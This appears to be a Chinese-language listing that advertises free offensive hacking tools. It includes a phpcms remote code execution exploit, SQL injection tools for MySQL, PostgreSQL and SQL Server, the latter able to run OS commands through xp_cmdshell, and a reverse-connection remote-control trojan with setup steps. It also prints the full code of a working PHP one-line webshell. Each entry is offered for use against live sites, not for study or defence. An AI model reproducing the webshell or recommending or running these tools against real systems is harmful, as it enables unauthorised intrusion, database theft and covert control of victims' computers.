phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
phpcms_9.5.1_index.php_远程代码执行漏洞(利用工具)
phpcms 2008 yp/product.php 文件pagesize参数没有过滤,导致执行任意php代码,利用前提pagesize>1。
河马MySQL注入工具v1.1,通过web前端应用获取数据库的内容。 support : UNION support : Error based
这个工具可以通过web接口,获取postgreSQL数据库的内容, 支持:数据获取 支持:文件读取。 contact me :[email protected]
这个工具使用sql server 的一些功能,执行操作系统命令, support xp_cmdshell execute arbtriry command support sp_OACreate create Wscript.shell execute arbtriry commnad support xp_dirtree list system directroy support execute SQL Query contact me :[email protected]
php一句话webshell 服务端和客户端,一句话为 <?php $_GET[2]($_GET[0]($_GET[1]));?> 支持函数system,passthru,shell_exec 可以执行操作系统任意命令,windows linux unix 等。 [email protected],欢迎下载使用,本软件为免费版。
利用前提,存在php+sqlserver数据库的注入点,或asp+sqlserver数据库的注入点, 或jsp+sqlserver数据库的注入点,就可以利用本工具,查询表,字段,数据,并且 可以执行系统cmd命令和显示主机系统目录列表,这个工具有一个亮点是支持cookie 和身份验证。 速度很快,一款不错的工具,值得收藏。 这是网上唯一一款支持cookie的注入工具。
大家好,今天给大家带来一款我自主开发的 采用反弹端口技术 远程控制软件 版本是3.1 该版本主要实现了以下功能: 1. 远程控制 2. 屏幕查看 3. 文件传输 4. Telnet超级终端 5. 卸载服务端 使用方法如下 先配置一个服务端, 点击生成服务端 域名和ip地址这里填写,被控端要连接的动态域名或静态ip地址 端口这里我填写80 然后将服务端运行一下,我这里在虚拟机下运行。 现在等待被控端上线,一般为1分钟内 等待 好了 已经上线了 好了, 完,有什么问题可以QQ上联系。 软件作者: 赵显阳 QQ:343561636 Email:[email protected]